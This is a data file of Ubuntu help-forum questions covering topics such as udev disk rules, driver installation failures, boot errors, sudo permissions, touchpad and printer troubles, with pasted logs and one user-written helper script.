216876	udev to ignore disk partition mapping ?	is it possible to disable partition mapping on specific sata disk ? i 'm using , say `` sdb '' , disk for drbd replication where kvm vm is installed directly . because of that , /dev/sdb got partitions and host recognized it after reboot . i 'd like to compose a rule to completely ignore disk ( partitions ) on kvm host by connection path if possible . i 've already tried with these rules ( and combinations of it ) in 10-ignore-disk.rules , but none of them worked out of the box kernel== '' sdb '' , group= '' disk '' , options : = '' last_rule '' kernel== '' sdb1 '' , env { udisks_presentation_hide } = '' 1 '' kernel== '' sdb '' , options : = '' ignore_device '' kernel== '' 1:0:0:0 '' , subsystems== '' scsi '' , drivers== '' sd '' , options : = '' last_rule ''
216882	[ chrome dev channel - video issues ]	i run : ubuntu 12.04 lts x86_64 chrome version 25.0.1323.1 dev with the previous crome 's version ( chrome version 24.0.1312.2 dev ) i had general problems with videos , but i was able to see the images and texts . today i updated to 25.0.1323.1 dev and now some videos have good sound but no images . so far i found the worst issue in specific videos , if not maximized . otherwise ( if video is maximized/in fullscreen ) the precedent behavior continue . so : am i the only one with such issue ? there is some chrome version that does not have this problem ( stable may be ) ? thank you
216884	cursor theme xfce	this is a weird bug i 'm experiencing . basically when i try to apply a cursor theme , it only shows up in my firefox ( the theme , that is ) . whenever i 'm on the desktop for example , it goes back to my stock theme . i 'm running xubuntu 12.10 64-bit , with nvidia proprietary drivers activated .
216885	ubuntu 12.10 wo n't fully load	i want to try ubuntu from my 16gb stick without ditching windows 7 just yet . everything boots up fine , i get the spash screen , i get the question screen ( try ubuntu or install ) . i select try ubuntu and then my screen goes black with what appears to be a prompt . no keyboard keys work at this time . have tried re-downloading ubuntu , rebooting , bu nothing seems to work .
216886	songs bought from the ubuntu one music store showing unknown album/artist in streaming app	i 've been using ubuntu one for several years and have purchased several albums from the ubuntu one music store . all was well while i was playing them from rhythmbox or banshee . however , i recently started using the u.o . streaming android app and streaming section of the one.ubuntu.com website and most of my music appears to be untagged . what is going on ? before this question is dismissed as a duplicate , let me reiterate the crucial differences : all of the music in my u.o . account was bought in the ubuntu one music store . this is not music that i ripped or bought elsewhere the mp3s that end up on my hard drive do appear to be tagged correctly the issue affects the u.o . streaming music android app and the website ( viewed in chrome on my win7 work pc ) is this some problem with the streaming service ? is there anything i can do ?
216893	does sudo really make you root for a while ?	on ubuntu , in what kind of situations , if any , running a command as a non-root to access a file/folder or create/delete a file/folder using sudo may result in `` permission denied '' while running the same command as root user would succeed ? the user is assumed to be a sudoer , of course . practical example on ubuntu 12 : i 've got this directory in / with root : root ownership and drwxr-xr-x permissions and i tried sudo date > file while in it as well as sudo date | tee file but got the same -bash : file : permission denied in both cases . sure enough , there 're no problems if i 'm root . this is quite frustrating .
216895	powerbook displays âfixing recursive fault but reboot is needed ! â and stops booting	i have an old powerbook g4 that worked ( more or less ) fine with a previous installation of ubuntu desktop 12.04 . a few days ago i decided to install ubuntu server instead , and got a copy of ubuntu server 12.10 . the installation seemed to complete successfully , but now , whenever i try to boot the system , it simply halts at some point after i unlock the hard disk . there is a lot of text on the screen ( which is normal for me during a boot , except now it 's mostly errors and debug information ) , the last of which is this : [ 26.338228 ] fixing recursive fault but reboot is needed ! pressing control command power to force a reboot yields exactly the same results . a search for the error message turned up many temporary solutions involving kernel parameters , but none of them have worked for me . i do n't think i can remove the default set of parameters ( which i think is quiet splash ) , but i can pass additional parameters on boot . i 've tried booting on ac and battery power , as well as using these combinations of kernel parameters while on battery power : acpi=enable pci=noacpi pci=assign-busse acpi=ht acpi=off nomodeset nomodeset acpi=off acpi=off nomodeset xforcevesa why am i getting this error and how can i fix it ?
216902	getting 404 errors when updating	when i run the update manager , it tells me to check my internet connnection . from the command line , i get the following when i run sudo apt-get update . err http : //extras.ubuntu.com quantal release.gpg unable to connect to extras.ubuntu.com : http : ign http : //extras.ubuntu.com quantal release ign http : //extras.ubuntu.com quantal/main sources/diffindex ign http : //extras.ubuntu.com quantal/main i386 packages/diffindex err http : //extras.ubuntu.com quantal/main translation-en_us unable to connect to extras.ubuntu.com : http : err http : //extras.ubuntu.com quantal/main translation-en unable to connect to extras.ubuntu.com : http : err http : //extras.ubuntu.com quantal/main sources unable to connect to extras.ubuntu.com : http : err http : //extras.ubuntu.com quantal/main i386 packages unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //ppa.launchpad.net/gezakovacs/ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gezakovacs/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/i18n/translation-en_us unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/i18n/translation-en unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/source/sources unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages unable to connect to extras.ubuntu.com : http : e : some index files failed to download . they have been ignored , or old ones used instead .
216907	nvidia driver 12.10 failed to install -xubuntu 12.10	hi i 'm trying to install nvidia driver for a nv6 vanta with the script from nvidia located here ( http : //www.nvidia.com/object/linux-display-ia32-71.86.15-driver.html ) . i 've edited the blacklist file as well as purged previous nvidia install . i did run the install script as root after having closed ligthdm . the script ran until it failed for what 's look like a kernel-related problems ( ? ? ? ) . thanks for any help , i 'm stuck there for now here 's the log file from the failed install : > nvidia-installer log file '/var/log/nvidia-installer.log ' creation time : tue nov 13 17:28:49 2012 installer version : 1.0.7 > path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin > option status : license pre-accepted : false update : false force update : false expert : false uninstall : false driver info : false precompiled interfaces : true no ncurses color : false query latest version : false opengl header files : true no questions : false silent : false no recursion : false no backup : false kernel module only : false sanity : false add this kernel : false no runlevel check : false no network : false no abi note : false no rpms : false no kernel module : false force selinux : default no x server check : false no cc version check : false run distro scripts : true no nouveau check : false sigwinch work around : true force tls : ( not specified ) x install prefix : ( not specified ) x library install path : ( not specified ) x module install path : ( not specified ) opengl install prefix : ( not specified ) opengl install libdir : ( not specified ) utility install prefix : ( not specified ) utility install libdir : ( not specified ) installer prefix : ( not specified ) doc install prefix : ( not specified ) kernel name : ( not specified ) kernel include path : ( not specified ) kernel source path : ( not specified ) kernel output path : ( not specified ) kernel install path : ( not specified ) precompiled kernel interfaces path : ( not specified ) precompiled kernel interfaces url : ( not specified ) proc mount point : /proc ui : ( not specified ) tmpdir : /tmp ftp mirror : ftp : //download.nvidia.com rpm file list : ( not specified ) selinux chcon type : ( not specified ) > using : nvidia-installer ncurses user interface - > license accepted . - > installing nvidia driver version 71.86.15 . - > running distribution scripts executing : '/usr/lib/nvidia/pre-install ' ... - > done . - > the distribution-provided pre-install script failed ! continue installation anyway ? ( answer : yes ) - > performing cc sanity check with cc= '' cc '' . - > performing cc version check with cc= '' cc '' . - > kernel source path : '/lib/modules/3.5.0-17-generic/build ' - > kernel output path : '/lib/modules/3.5.0-17-generic/build ' > error : if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the `` kbuild_output '' or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent nvidia-installer command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent nvidia-installer command line option . > error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com . **here 's my hardware : ** > cool-evo-d500 description : space-saving computer product : evo d500 vendor : compaq serial : 6y24jyhza04z width : 32 bits capabilities : smbios-2.3 dmi-2.3 smp-1.4 smp configuration : boot=normal chassis=space-saving cpus=1 uuid=07f4e4d5-ee55-bd11-ab30-085eb767c71c *-core description : motherboard product : 0788h vendor : compaq physical id : 0 serial : 6y24jyhza04z *-firmware description : bios vendor : compaq physical id : 1 version : 686y2 v2.11 date : 02/27/2002 size : 128kib capacity : 448kib capabilities : pci pnp apm upgrade shadowing cdboot bootselect edd int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int5printscreen int9keyboard int14serial int17printer acpi usb agp ls120boot zipboot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) pentium ( r ) 4 cpu 1.70ghz vendor : intel corp. physical id : 5 bus info : cpu @ 0 version : 15.1.2 slot : xu1 size : 1700mhz capacity : 2300mhz width : 32 bits clock : 400mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm up pebs bts configuration : id=0 *-cache:0 description : l1 cache physical id : 6 slot : internal l1 cache size : 8kib capacity : 20kib capabilities : burst internal write-back data *-cache:1 description : l2 cache physical id : 7 slot : cache l2 size : 256kib capacity : 4mib capabilities : burst internal write-back data *-memory:0 description : system memory physical id : 21 slot : system board or motherboard capacity : 3gib *-bank:0 description : dimm sdram synchronous 133 mhz ( 7.5 ns ) product : 6mx64pc133cl3 168p vendor : jedec id:7f 98 00 00 00 00 00 00 physical id : 0 serial : 00f11204 slot : xmm1 size : 128mib width : 64 bits clock : 133mhz ( 7.5ns ) *-bank:1 description : dimm sdram synchronous 133 mhz ( 7.5 ns ) product : 16mx64pc133cl3168 vendor : jedec id:7f 98 00 00 00 00 00 00 physical id : 1 serial : bad22002 slot : xmm2 size : 128mib width : 64 bits clock : 133mhz ( 7.5ns ) *-bank:2 description : dimm sdram synchronous 133 mhz ( 7.5 ns ) product : hys64v32220gu-7.5 . vendor : jedec id : c1 49 4e 46 49 4e 45 4f physical id : 2 serial : 5cc80f01 slot : xmm3 size : 256mib width : 64 bits clock : 133mhz ( 7.5ns ) *-memory:1 unclaimed description : flash memory physical id : 22 slot : system board or motherboard capacity : 512kib *-bank unclaimed description : chip flash non-volatile physical id : 0 slot : xu15 size : 512kib width : 4 bits *-memory:2 unclaimed physical id : 0 *-memory:3 unclaimed physical id : 2 *-pci description : host bridge product : 82845 845 [ brookdale ] chipset host bridge vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 memory : f8000000-fbffffff *-pci:0 description : pci bridge product : 82845 845 [ brookdale ] chipset agp bridge vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 03 width : 32 bits clock : 66mhz capabilities : pci normal_decode bus_master resources : memory : fd000000-fe1fffff memory : f5e00000-f7ffffff *-display unclaimed description : vga compatible controller product : nv6 [ vanta/vanta lt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : 15 width : 32 bits clock : 66mhz capabilities : pm agp agp-2.0 vga_controller bus_master cap_list configuration : latency=64 maxlatency=1 mingnt=5 resources : memory : fd000000-fdffffff memory : f6000000-f7ffffff memory : f5e00000-f5e0ffff *-pci:1 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : 12 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master resources : ioport:1000 ( size=4096 ) memory : fc200000-fc4fffff *-network description : ethernet interface product : 82801ba/bam/ca/cam ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:02:08.0 logical name : eth0 version : 03 serial : 00:08:02:37 : c9 : bb size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half ip=98.143.214.132 latency=66 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mbit/s resources : irq:20 memory : fc400000-fc400fff ioport:1000 ( size=64 ) *-isa description : isa bridge product : 82801ba isa bridge ( lpc ) vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 12 width : 32 bits clock : 33mhz capabilities : isa bus_master configuration : driver=lpc_ich latency=0 resources : irq:0 *-ide description : ide interface product : 82801ba ide u100 controller vendor : intel corporation physical id : 1f.1 bus info : pci @ 0000:00:1f.1 version : 12 width : 32 bits clock : 33mhz capabilities : ide bus_master configuration : driver=ata_piix latency=0 resources : irq:0 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport:2480 ( size=16 ) *-usb:0 description : usb controller product : 82801ba/bam usb controller # 1 vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 version : 12 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport:2440 ( size=32 ) *-usb:1 description : usb controller product : 82801ba/bam usb controller # 1 vendor : intel corporation physical id : 1f.4 bus info : pci @ 0000:00:1f.4 version : 12 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport:2460 ( size=32 ) *-multimedia description : multimedia audio controller product : 82801ba/bam ac'97 audio controller vendor : intel corporation physical id : 1f.5 bus info : pci @ 0000:00:1f.5 version : 12 width : 32 bits clock : 33mhz capabilities : bus_master configuration : driver=snd_intel8x0 latency=0 resources : irq:17 ioport:2000 ( size=256 ) ioport:2400 ( size=64 ) *-scsi:0 physical id : 3 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : st340014a vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 8.01 serial : 5jxfr5ca size : 37gib ( 40gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=0008da1c *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 2d2e5c33-b92d-4448-85b6-90888748b41a size : 36gib capacity : 36gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-11-11 03:08:28 filesystem=ext4 lastmountpoint=/ modified=2012-11-13 17:05:43 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2012-11-13 17:05:43 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 510mib capacity : 510mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 510mib capabilities : nofs *-scsi:1 physical id : 4 logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : dvdram gsa-4163b vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : a104 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc
216914	gedit not launching	for some reason , gedit does not launch . here is the output it gives : chris @ chris-ubuntu-laptop : ~ $ gedit chris @ chris-ubuntu-laptop : ~ $ descriptive , let us try the help . chris @ chris-ubuntu-laptop : ~ $ gedit -- help chris @ chris-ubuntu-laptop : ~ $ so that does not work either . i have tried having it open a file . gui launch techniques fail too . synaptic and terminal based efforts to reinstall fail . the one thing that works is using sudo . i do not want to run as a super user though , so i do n't accidently break something ( does n't seem to be helping : d ) . oh yes , i noticed this when i was running a shell script that i have been testing . here it is : # /bin/bash # # copyright 2012 christopher david king # # email : g.nius.ck @ gmail.com # # # # this program is free software : you can redistribute it and/or modify # # it under the terms of the gnu general public license as published by # # the free software foundation , either version 3 of the license , or # # ( at your option ) any later version . # # # # this program is distributed in the hope that it will be useful , # # but without any warranty ; without even the implied warranty of # # merchantability or fitness for a particular purpose . see the # # gnu general public license for more details . # # # # you should have received a copy of the gnu general public license # # along with this program . if not , see < http : //www.gnu.org/licenses/ > . # # usage : [ -h ] | [ -- help ] | [ -u ] [ filename ] [ mode ] # # helps to create new scripts . it will open them in a text editor of your choice ( gedit by default ) and give it the permissions you want ( 777 by default . ) # # -u , uninteractive , will automatically overwrite scripts , and will fail if a file name is not supplied # # -h display this help . # # -- help display this help . if [ -w ~/bin ] ; then cd ~/bin ; fi # work in the user 's bin folder . usage ( ) # this is for help { cat < < - _eof_ usage : [ -h| -- help ] [ -q| -- quite ] [ filename ] [ text_editor ] [ mode ] helps to create new scripts . it will open them in a text editor of your choice ( gedit by default ) and give it the permissions you want ( 777 by default . ) options : -q , -- quiet will not prompt user for input . will fail if no filename given . will automatically overwrite files if necesary . -h , -- help display this help . _eof_ } interactive=0 if [ `` $ 1 '' = `` -q '' ] || [ `` $ 1 '' = `` -- quiet '' ] ; then interactive=1 shift fi case $ 1 in `` '' ) if [ `` $ interactive '' = `` 0 '' ] ; then echo -n `` what will you name your script ? > '' # in case they forgot , we do not want to crash read name else echo `` no file supplied . '' 1 > & 2 exit 1 fi ; ; `` -h '' | `` -- help '' ) usage exit 0 ; ; * ) name= $ 1 ; ; esac mode=777 # a default command= '' gedit +2 -b '' # also a default case $ 2 in [ 0-8 ] [ 0-8 ] [ 0-8 ] ) mode= $ 2 ; shift ; ; # i will adapt it in the future to accept more values of chmod esac case $ 2 in `` '' ) : ; ; * ) command= $ 2 esac if [ -f $ name ] & & [ `` $ interactive '' = `` 0 '' ] ; then echo -n `` the file \ '' $ name\ '' exists . do you want to overwrite it ? ( y/n ) > '' read response if [ $ response = 'n ' ] ; then echo `` exiting '' exit 0 fi fi echo -e `` # /bin/bash\n\nexit 0 '' > $ name # add in the first line of any shell script $ command $ name # go to line 2 , since the first was already done for them . also , make sure gedit does n't close when the terminal does , and it does n't block the terminal . chmod $ mode $ name exit 0 i hope that did n't break it .
216922	remove facebook webapp integration in quantal	how can i remove the facebook app that is displayed in dash and in the launcher ? when i went to facebook using firefox the first time , it asked me to install that . but now i ca n't find out how to remove it . it 's not in the ubuntu software centre ( searched for `` facebook '' in installed app return no result edit : here is an image : i have tried every method mentioned but the facebook is still there . any idea ?
216927	network bonding with wan and wireless	i am still new to linux ubuntu and i wanted to know if it is possible to bond a lan and wireless internet connection when both of them use static ip addresses . my current information is : lan : 10.0.2.200 , netmask 255.255.255.0 , gateway 10.0.2.254 wireless : 192.168.1.210 , netmask 255.255.255.0 gateway 192.168.1.1
216933	canon lbp5050 recognized but does n't print	i tried many different ways to get my printer to work : i tried using a generic model for the printer , since it is not supported by ubuntu yet . i tried using a model that is close to the one i have . i tried downloading the official .rpm package and repack it as a .deb package and install it ( not sure if that actually worked ) . i tried to run the script provided here and that seems to have worked for others but not for me . what i have now is this : my printer is recognized with the right name , make and model . when i send data to the printer it changes from 'idle ' to 'processing ' and then just flags the job as done , even though it did n't do a thing . i have no idea how to repair the mess i created . if anyone has an idea , i would really appreciate it .
216936	ubuntu software center wont open . help	i just got ubuntu for my pc . i know very little about the program and i have'nt altered anything at at all . but for some reason the ubuntu software center wont open . i dont even get an error message i just click and it wont open . im running on the latest version of ubuntu . also the update manager dosnt work but i 'll cross that bridge when i get there . so if you guys know why my ubuntu software center wont open that would be major help . thanks
216941	is recovering from the recycle bin/rubbish bin/trash can available with gnome or not ?	i have ubuntu 12.04 and also downloaded gnome desktop . is recovering from the recycle bin/rubbish bin/trash can available with gnome or not ? i get conflicting answers about this from forum search and “answers” some say you can find it in “local” but i can find no local file where it should be . one post says navigate to ~/.local/share/trash/ but i can not find “local” . the only way i can find anything like this is places > computer > file system > usr > local > share but “share” contains no trash folder . is “~” the same as user name ? i am the only user on this pc , is that why i ca n't find it ? others say you have to download gnome tweaks . what i am looking for is the same in gnome as there is in unity , a trash can that you can open and restore trashed items from , but i do n't seem to have it in gnome , however if it is there somewhere i would rather find it than download gnome tweaks . also what is the correct term ? recycle bin , rubbish bin or trashcan ? on my ubuntu 12.04 when deleting it is referred to as “the rubbish bin” but no-one else seems to call it that , is it because i opted for english language uk rather than us ?
216947	my laptop with linux/ ubuntu is n't working	i have a dell laptop with ubuntu linux . a day i tried to start it up and a black screen just appeared that says : gnu grub version1.98+20100804-5ubuntu3 ( and these clickable options : ) -ubuntu , with linux 2.6.35-22-generic -ubuntu , with linux 2.6.35-22-generic ( recovery mode ) -memory test ( memtest86+ ) -memory test ( memtest86+ , serial console 115200 ) when i click the first one , a bunch of text appears like : mount : mounting /dev/disk/by-uuid/8396a225 ... failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target file system does n't have requested /sbin/init no init found . try passing init= bootarg enter 'help ' for a list of built-in commands busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) ( initramfs ) when i enter 'help ' a bunch more incomprehensible text appears . whenever i press the enter key all that pops up is ( intetramfs ) if anyone can make rhyme or reason out of this please , please help me out so it can boot up normally and i can be set . if there 's some kind of special code i have to type in or something i know nothing about computers .
216948	flickering screen	i have a ubuntu 12.04 lts installed on my hp compaq 420 laptop . my problem is that everytime i reach the log-in screen , the screen flickers heavily and also after i have entered my username and password . i have an intel gm45 video driver . i also have this kind of problem in other kinds distro ( fedora 17 , opensuse , ubuntu 12.10 and other variants of ubuntu which is based on ubuntu 12.04 + ) . i have searched across the net to find some solution but i fail . any ideas ?
216949	how do i stop root from running a program	i would like to prevent my root user from running certain applications that can change the permissions of files which in turn prevents normal users from running those applications again . for example , if i sudo to root , and then run thunderbird from the command prompt , it changes the permissions of files within my home dir / profile so i can no longer run it as a normal user ; what i would like to do is prevent root from running thunderbird and hence stop this user error from repeating itself . any suggestions ? to clarify , if i have a lot of administration to do i use `` sudo -s '' which gives me a root shell , its just once a year or so , i shoot myself in the foot .
216954	whats wrong with my hard drive ?	i am running ubuntu 12.04 on an acer aspire one d225 , and recently replaced my hard drive to a 60gb ssd . the first day i did , i got a kernal panic error about an i/o error to a superblock . it only happened once , but since then the gui periodically crashes and does not restart , requiring a hard shutdown and reboot . i 'm experienced on windows , but new to and lost with linux . the built in self-tests on the drive have not shown anything yet , nothing starting with the smart data , but the system log is repeating the following every couple of seconds . [ 315.428143 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) ata1.00 : unexpected _gtf length ( 4 ) [ 315.467150 ] ata1.00 : unexpected _gtf length ( 4 ) [ 315.467841 ] ata1.00 : configured for udma/33 [ 315.467860 ] ata1 : eh complete [ 317.001617 ] ata1 : exception emask 0x50 sact 0x0 serr 0x40d0800 action 0xe frozen [ 317.001637 ] ata1 : irq_stat 0x00400040 , connection status changed [ 317.001652 ] ata1 : serror : { hostint phyrdychg commwake 10b8b devexch } [ 317.001671 ] ata1 : hard resetting link [ 317.896151 ] ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 317.901885 ] ata1.00 : unexpected _gtf length ( 4 ) [ 317.911867 ] ata1.00 : unexpected _gtf length ( 4 ) [ 317.912521 ] ata1.00 : configured for udma/33 [ 317.912540 ] ata1 : eh complete [ 319.433541 ] ata1 : exception emask 0x10 sact 0x0 serr 0x90000 action 0xe frozen [ 319.433553 ] ata1 : irq_stat 0x00400000 , phy rdy changed i do n't even know were to begin , is my hard drive bad , or is this something that a reformat/re-install will fix ?
216956	how to change the hard drive file type ?	i installed ubuntu os . then tried to install windows 7 as dual boot . but i get error message that unknown file system . not ntfs . now there is no os in system . how to change the hard drive file system to ntfs to install windows 7 and then ubuntu ?
216961	how to install wubi alongside windows 8 ?	so , i tried to install wubi alongside my windows 8 . i did all the steps shown in the tutorial . problem is , when i boot , it wo n't allow me to access the ubuntu os . i 've googled it and it seems like windows 8 has some protection against other os , did n't get it quite well ... anyway , i 'm looking for a way to have wubi in my windows 8 machine . i would n't like to make a dual boot and partition my hd for several reasons , so i 'd rather go for wubi ... any suggestions ?
216964	problem with the instalation of ubuntu 12.10	well when i try to install ubuntu in my coputer , the option `` install with the { os } , my computert restars and start again the installation , there is no option to choose area or create an account , only it restarts . help me please
216974	touchpad is recognized but not working on toshiba p855-s5312 - ubuntu 12.10	i just made a new fresh install of ubuntu 12.10 , everything works nice but the touchpad istn working , it is recognized but it is not working , here a paste bin of what i get when i type `` xinput list '' . $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ genius optical mouse id=9 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ toshiba web camera - hd id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=13 [ slave keyboard ( 3 ) ]
216975	atheros ar8161 not recognized	apparently i am not the only one with this problem , this was my solution , but it did not work , of course : i downloaded the tar from another computer . i found the file of the atheros driver that i needed which is apparently atl1c , put that file on my ubuntu desktop and ran the following in the terminal : cd ~/desktop atl1c make sudo make install is n't there a simple code i could use once i have the atl1c folder on the desktop ?
216976	which ubuntu distribution should i use for my old desktop ?	i have an old computer which has 512mb ram and 128mb graphic card . it has windows 95 currently , it loads fine but it has some issues with internet connection and pendrive . i am tired of solving problems . i booted live cd of ubuntu 10.10 . it loads slow and some display problems . but it resolved my internet problem and pendrive . so i want install ubuntu which is equivalent to windows 95 in boot , application load , graphics level . can anyone suggest ubuntu version ? what about xubuntu ?
216977	how can i install ubuntu on my nexus 7 while being able to recover from an nandroid backup ?	i use cyanogenmod and clockwork recovery on my nexus 7 . how can my existing full nandroid backup be used to restore my device after installing ubuntu ? the instructions assume `` recovery '' would mean re-flashing the vanilla image , at factory , data-wiped condition . it would be useful to provide a .zip that can be flashed via clockwork ( or other ) recovery usin rom manager or booting into recovery and back to whatever nandroid backup there is - much as any other rom is provided/used .
216983	how to switch from 32 bit to 64bit without reinstalling ?	i have a laptop supports 64bit . i 'm using ubuntu 12.04 32 bit by a mistake i installed 32bit . now i want to switch from 32 bit to 64 bit and a new version of ubuntu 12.10 is also available so i want to install it . is there any easy way with out new installation ? i have a separate partition for ubuntu of 40 gb size if i reinstall the new 64 bit version on it will it remove my applications and other stuff from the other partitions . like /home partition and /data partition . also tell how to make backup .
216988	repeated wi-fi crashes after connecting a 12.10 server	i tried looking for another post about this , but they were all using wifi connection , while my problem is a little different . a few days ago i formatted an old computer and installed ubuntu server 12.10 on that , to use it as a home fileserver ( so i also installed samba and openssh , as an online guide suggested ) . i plugged in the ethernet cable and straight since starting the installation , my wifi network crashed . from since it crashes every now and then , without forewarn or malfunctions , it simply stops working . my wifi repeater is also an ethernet switch , so both the server and wifi are plugged in there , one physically through ethernet , the other being integrated in the switch . luckily i can reboot just the wifi by pressing a button on the repeater , but since i started the server project to have all files available on any device on the network . when someone is looking at a video through a wdtv device the crash means he has to reconnect and start over , so rebooting it is not an option for me .. i must admit i 'm more than just inexperienced with ubuntu , so i would happily accept any suggestion .
216990	how to plot xy coordinate graph in ubuntu ?	i 'm learning network and transportation model . i ' d like to plot graph in xy coordinate from the following data : i am familiar with r and latex , but i do n't know is there any easy to learn and easy to control software in ubuntu that can help me plot xy graph in xy coordinate . thanks !
216994	gparted 'ntfs signature missing ' when creating new swap partition	i followed the instructions in this thread to create a new swap partition post-installation . my /var/tmp/fstab file currently has the following in it : /host/ubuntu/disks/swap.disk none swap sw 0 0 uuid=4ef64da8-c637-43de-a389-8a059eb6c069 none swap sw 0 0 gparted gives this error message : warning : ntfs signature is missing . failed to mount 'dev/sda1 ' : invalid argument the device '/dev/sda1 ' does n't have a valid ntfs . maybe you selected the wrong device ? or the whole disk instead of a partition ? or the other way around ? statvfs ( ) : no such file or directory unable to read the contents of this file system ! because of this some partitions may be unavailable . please help ! other gparted stats : file system : ntfs size : 199.00 mib flags : boot path : /dev/sda1 status : mounted on label : uuid : 4ef64da8-c637-43de-a389-8a059eb6c069 update : i posted a follow-up question that includes the boot-repair pastebin readout .
216996	command 'top ' what do `` 3 users ' mean ?	i used the command 'top ' to show running processes , and i noticed the first and second line look like this : top - 00:30:31 up 5:41 , 3 users , load average : 0.14 , 0.16 , 0.27 top - 00:31:25 up 5:42 , 3 users , load average : 0.38 , 0.20 , 0.28 when i first noticed it , it said 4 users . my question is what does it mean by `` 3 users '' or `` 4 '' users ?
